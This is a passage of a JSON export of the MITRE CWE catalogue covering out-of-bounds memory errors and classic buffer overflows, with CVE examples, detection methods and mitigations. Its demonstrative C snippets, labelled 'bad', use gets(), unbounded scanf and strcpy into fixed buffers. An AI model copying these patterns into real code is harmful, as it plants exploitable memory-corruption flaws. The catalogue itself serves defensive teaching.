execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0558"},{"Reference":"CVE-2009-0269","Description":"chain: -1 value from a function call was intended to indicate an error, but is used as an array index instead.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0269"},{"Reference":"CVE-2009-0566","Description":"chain: incorrect calculations lead to incorrect pointer dereference and memory corruption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0566"},{"Reference":"CVE-2009-1350","Description":"product accepts crafted messages that lead to a dereference of an arbitrary pointer","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1350"},{"Reference":"CVE-2009-0191","Description":"chain: malformed input causes dereference of uninitialized memory","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0191"},{"Reference":"CVE-2008-4113","Description":"OS kernel trusts userland-supplied length value, allowing reading of sensitive information","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113"},{"Reference":"CVE-2005-1513","Description":"Chain: integer overflow in securely-coded mail program leads to buffer overflow. In 2005, this was regarded as unrealistic to exploit, but in 2020, it was rediscovered to be easier to exploit due to evolutions of the technology.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1513"},{"Reference":"CVE-2003-0542","Description":"buffer overflow involving a regular expression with a large number of captures","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0542"},{"Reference":"CVE-2017-1000121","Description":"chain: unchecked message size metadata allows integer overflow (CWE-190) leading to buffer overflow (CWE-119).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000121"}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A5","Entry_Name":"Buffer Overflows","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR00-C","Entry_Name":"Understand how arrays work"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR30-C","Entry_Name":"Do not form or use out-of-bounds pointers or array subscripts","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR38-C","Entry_Name":"Guarantee that library functions do not form invalid pointers","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ENV01-C","Entry_Name":"Do not make assumptions about the size of an environment variable"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP39-C","Entry_Name":"Do not access a variable through a pointer of an incompatible type","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO37-C","Entry_Name":"Do not assume character data has been read"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR32-C","Entry_Name":"Do not pass a non-null-terminated character sequence to a library function that expects a string","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":7,"Entry_Name":"Buffer Overflow"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"100"}},{"attr":{"@_CAPEC_ID":"123"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"42"}},{"attr":{"@_CAPEC_ID":"44"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"47"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"9"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1029"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 5, &#34;Public Enemy #1: The Buffer Overrun&#34; Page 127; Chapter 14, &#34;Prevent I18N Buffer Overruns&#34; Page 441"}},{"attr":{"@_External_Reference_ID":"REF-56"}},{"attr":{"@_External_Reference_ID":"REF-57"}},{"attr":{"@_External_Reference_ID":"REF-58"}},{"attr":{"@_External_Reference_ID":"REF-59"}},{"attr":{"@_External_Reference_ID":"REF-60"}},{"attr":{"@_External_Reference_ID":"REF-61"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 5, &#34;Memory Corruption&#34;, Page 167"}},{"attr":{"@_External_Reference_ID":"REF-64"}}]},"Notes":{"Note":{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"It is possible in any programming languages without memory management support to attempt an operation outside of the bounds of a memory buffer, but the consequences will vary widely depending on the language, platform, and chip architecture."}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Likelihood_of_Exploit, Name, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Alternate_Terms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Alternate_Terms, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Potential_Mitigations, Relationships"}],"Previous_Entry_Name":[{"#text":"Buffer Errors","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Constrain Operations within the Bounds of an Allocated Memory Buffer","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Constrain Operations within the Bounds of a Memory Buffer","attr":{"@_Date":"2010-12-13"}}]}},"120":{"attr":{"@_ID":"120","@_Name":"Buffer Copy without Checking Size of Input (\'Classic Buffer Overflow\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow.","Extended_Description":"A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold, or when a program attempts to put data in a memory area outside of the boundaries of a buffer. The simplest type of error, and the most common cause of buffer overflows, is the \\"classic\\" case in which the program copies the buffer without restricting how much is copied. Other variants exist, but the existence of a classic overflow strongly suggests that the programmer is not considering even the most basic of security protections.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"119","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"123","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Resultant"},{"Ordinality":"Primary"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Assembly","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":[{"Term":"Classic Buffer Overflow","Description":"This term was frequently used by vulnerability researchers during approximately 1995 to 2005 to differentiate buffer copies without length checks (which had been known about for decades) from other emerging weaknesses that still involved invalid accesses of buffers, as vulnerability researchers began to develop advanced exploitation techniques."},{"Term":"Unbounded Transfer"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands"],"Note":"Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program\'s implicit security policy. This can often be used to subvert any other security service."},{"Scope":"Availability","Impact":["Modify Memory","DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)"],"Note":"Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges."]},"Effectiveness":"High","Effectiveness_Notes":"Detection techniques for buffer-related errors are more mature than for most other weakness types."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."},{"attr":{"@_Detection_Method_ID":"DM-9"},"Method":"Manual Analysis","Description":"Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer.","Be wary that a language\'s interface to native code may still be subject to overflows, even if the language itself is theoretically safe."]}},{"attr":{"@_Mitigation_ID":"MIT-4.1"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Examples include the Safe C String Library (SafeStr) by Messier and Viega [REF-57], and the Strsafe.h library from Microsoft [REF-56]. These libraries provide safer versions of overflow-prone string-handling functions."]},"Effectiveness_Notes":"This is not a complete solution, since many buffer overflows are not related to strings."},{"attr":{"@_Mitigation_ID":"MIT-10"},"Phase":"Build and Compilation","Strategy":"Compilation or Build Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that automatically provide a protection mechanism that mitigates or eliminates buffer overflows.","For example, certain compilers and extensions provide automatic buffer overflow detection mechanisms that are built into the compiled code. Examples include the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not necessarily a complete solution, since these mechanisms can only detect certain types of overflows. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-9"},"Phase":"Implementation","Description":{"xhtml:p":"Consider adhering to the following rules when allocating and managing an application\'s memory:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Double check that your buffer is as large as you specify.","When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string.","Check buffer boundaries if accessing the buffer in a loop and make sure there is no danger of writing past the allocated space.","If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions."]}}}},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-11"},"Phase":"Operation","Strategy":"Environment Hardening","Description":{"xhtml:p":["Run or compile the software using features or extensions that randomly arrange the positions of a program\'s executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code.","Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]."]},"Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution. However, it forces the attacker to guess an unknown value that changes every program execution. In addition, an attack could still cause a denial of service, since the typical response is to exit the application."},{"attr":{"@_Mitigation_ID":"MIT-12"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Use a CPU and operating system that offers Data Execution Protection (NX) or its equivalent [REF-60] [REF-61].","Effectiveness":"Defense in Depth","Effectiveness_Notes":"This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software\'s state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application."},{"Phase":["Build and Compilation","Operation"],"Description":"Most mitigating technologies at the compiler or OS level to date address only a subset of buffer overflow problems and rarely provide complete protection against even that subset. It is good practice to implement strategies to increase the workload of an attacker, such as leaving the attacker to guess an unknown value that changes every program execution."},{"attr":{"@_Mitigation_ID":"MIT-13"},"Phase":"Implementation","Description":"Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available.","Effectiveness":"Moderate","Effectiveness_Notes":"This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131)."},{"attr":{"@_Mitigation_ID":"MIT-21"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":"When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code asks the user to enter their last name and then attempts to store the value entered in the last_name array.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char last_name[20];printf (\\"Enter your last name: \\");scanf (\\"%s\\", last_name);","xhtml:br":["",""]}},"Body_Text":"The problem with the code above is that it does not restrict or limit the size of the name entered by the user. If the user enters \\"Very_very_long_last_name\\" which is 24 characters long, then a buffer overflow will occur since the array can only hold 20 characters total."},{"attr":{"@_Demonstrative_Example_ID":"DX-6"},"Intro_Text":"The following code attempts to create a local copy of a buffer to perform some manipulations to the data.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void manipulate_string(char * string){}","xhtml:div":{"#text":"char buf[24];strcpy(buf, string);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"However, the programmer does not ensure that the size of the data pointed to by string will fit in the local buffer and copies the data with the potentially dangerous strcpy() function. This may result in a buffer overflow condition if an attacker can influence the contents of the string parameter."},{"attr":{"@_Demonstrative_Example_ID":"DX-5"},"Intro_Text":"The code below calls the gets() function to read in data from the command line.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"}","xhtml:div":{"#text":"char buf[24];printf(\\"Please enter your name and press &lt;Enter&gt;\\\\n\\");gets(buf);...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":"However, gets() is inherently unsafe, because it copies all input from STDIN to the buffer without checking size. This allows the user to provide a string that is larger than the buffer size, resulting in an overflow condition."},{"Intro_Text":"In the following example, a server accepts connections from a client and processes the client request. After accepting a client connection, the program will obtain client information using the gethostbyaddr method, copy the hostname of the client that connected to a local variable and output the hostname of the client to a log file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"......","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *clienthp;char hostname[MAX_LEN];// create server socket, bind to server address and listen on socket...// accept client connections and process requestsint count = 0;for (count = 0; count &lt; MAX_CONNECTIONS; count++) {}close(serversocket);","xhtml:br":["","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int clientlen = sizeof(struct sockaddr_in);int clientsocket = accept(serversocket, (struct sockaddr *)&amp;clientaddr, &amp;clientlen);if (clientsocket &gt;= 0) {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"clienthp = gethostbyaddr((char*) &amp;clientaddr.sin_addr.s_addr, sizeof(clientaddr.sin_addr.s_addr), AF_INET);strcpy(hostname, clienthp-&gt;h_name);logOutput(\\"Accepted client connection from host \\", hostname);// process client request...close(clientsocket);","xhtml:br":["","","","","",""]}}}}}},"xhtml:br":""}},"Body_Text":"However, the hostname of the client that connected may be longer than the allocated size for the local hostname variable. This will result in a buffer overflow when copying the client hostname to the local variable using the strcpy method."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-1094","Description":"buffer overflow using command with long argument","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1094"},{"Reference":"CVE-1999-0046","Description":"buffer overflow in local program using long environment variable","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0046"},{"Reference":"CVE-2002-1337","Description":"buffer overflow in comment characters, when product increments a counter for a \\"&gt;\\" but does not decrement for \\"&lt;\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1337"},{"Reference":"CVE-2003-0595","Description":"By replacing a valid cookie value with an extremely long string of characters, an attacker may overflow the application\'s buffers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0595"},{"Reference":"CVE-2001-0191","Description":"By replacing a valid cookie value with an extremely long string of characters, an attacker may overflow the application\'s buffers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0191"}]},"Functional_Areas":{"Functional_Area":"Memory Management"},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unbounded Transfer (\'classic overflow\')"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Buffer Overflow"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Buffer overflow"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A5","Entry_Name":"Buffer Overflows","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":7,"Entry_Name":"Buffer Overflow"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP8","Entry_Name":"Faulty Buffer Access"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-120"},{"attr":{"@_Taxonomy_Name":"OMG 